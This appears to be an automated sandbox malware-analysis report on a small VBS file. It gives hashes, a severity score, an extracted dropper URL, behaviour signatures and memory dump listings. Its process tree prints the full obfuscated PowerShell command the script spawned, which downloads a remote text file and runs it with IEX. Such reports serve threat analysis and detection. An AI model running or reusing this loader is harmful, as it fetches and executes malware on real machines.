Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    29-12-2023 21:01

General

  • Target

    03e4a5b246180743a15aabbe28f2acb5.vbs

  • Size

    1KB

  • MD5

    03e4a5b246180743a15aabbe28f2acb5

  • SHA1

    36caf7a27c4eb6c30557737ea50b8e47e32e07a9

  • SHA256

    03674af9c28f5702955756f95a9173954188deb1d4f14b0bc8f0457e9383d6db

  • SHA512

    3cd8706b9105cd1a71d95142eb62df9f39601a7752648ce47583d1b8715f89c0d839e161730ef1d77becb7b9f0edae6ff353394046fa7e9901f9e06bbf291996

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia601506.us.archive.org/27/items/bypass_202108/bypass.txt

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03e4a5b246180743a15aabbe28f2acb5.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://ia601506.us.archive.org/27/items/bypass_202108/bypass.txt';$B ='ETH COINt.WTF COINlIOSNT'.RePlace('ETH COIN','nE').RepLace('TF COIN','EbC').RepLace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.RepLace('S COIN ','Wn').RepLace('SO','oaD').RepLace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.RepLace('os COIN','X(n`e').RepLace('BTC COIN','-Ob').RepLace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2192

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2192-4-0x000000001B610000-0x000000001B8F2000-memory.dmp

    Filesize

    2.9MB

  • memory/2192-5-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

    Filesize

    32KB

  • memory/2192-6-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2192-7-0x0000000002B70000-0x0000000002BF0000-memory.dmp

    Filesize

    512KB

  • memory/2192-12-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2192-11-0x0000000002B70000-0x0000000002BF0000-memory.dmp

    Filesize

    512KB

  • memory/2192-10-0x0000000002B70000-0x0000000002BF0000-memory.dmp

    Filesize

    512KB

  • memory/2192-9-0x0000000002B70000-0x0000000002BF0000-memory.dmp

    Filesize

    512KB

  • memory/2192-8-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

    Filesize

    9.6MB